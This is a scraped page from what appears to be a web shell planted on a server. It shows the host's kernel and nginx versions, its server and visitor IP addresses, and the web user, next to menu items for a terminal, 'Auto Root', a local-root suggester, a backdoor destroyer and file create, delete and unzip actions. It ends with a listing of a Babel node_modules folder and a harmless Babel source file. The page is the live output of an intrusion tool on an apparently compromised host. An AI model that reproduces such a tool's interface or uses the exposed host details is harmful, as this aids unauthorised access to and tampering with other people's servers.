Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.219.197.162
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
@babel /
preset-env /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
polyfills
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
available-plugins.js
12.14
KB
-rw-rw-r--
2022-08-30 11:49
debug.js
825
B
-rw-rw-r--
2022-08-30 11:49
filter-items.js
819
B
-rw-rw-r--
2022-08-30 11:49
get-option-specific-excludes.js
261
B
-rw-rw-r--
2022-08-30 11:49
index.js
11.14
KB
-rw-rw-r--
2022-08-30 11:49
module-transformations.js
375
B
-rw-rw-r--
2022-08-30 11:49
normalize-options.js
7.39
KB
-rw-rw-r--
2022-08-30 11:49
options.js
972
B
-rw-rw-r--
2022-08-30 11:49
plugins-compat-data.js
824
B
-rw-rw-r--
2022-08-30 11:49
targets-parser.js
462
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.pluginsBugfixes = exports.plugins = void 0; var _plugins = require("@babel/compat-data/plugins"); var _pluginBugfixes = require("@babel/compat-data/plugin-bugfixes"); var _availablePlugins = require("./available-plugins"); const pluginsFiltered = {}; exports.plugins = pluginsFiltered; const bugfixPluginsFiltered = {}; exports.pluginsBugfixes = bugfixPluginsFiltered; for (const plugin of Object.keys(_plugins)) { if (Object.hasOwnProperty.call(_availablePlugins.default, plugin)) { pluginsFiltered[plugin] = _plugins[plugin]; } } for (const plugin of Object.keys(_pluginBugfixes)) { if (Object.hasOwnProperty.call(_availablePlugins.default, plugin)) { bugfixPluginsFiltered[plugin] = _pluginBugfixes[plugin]; } }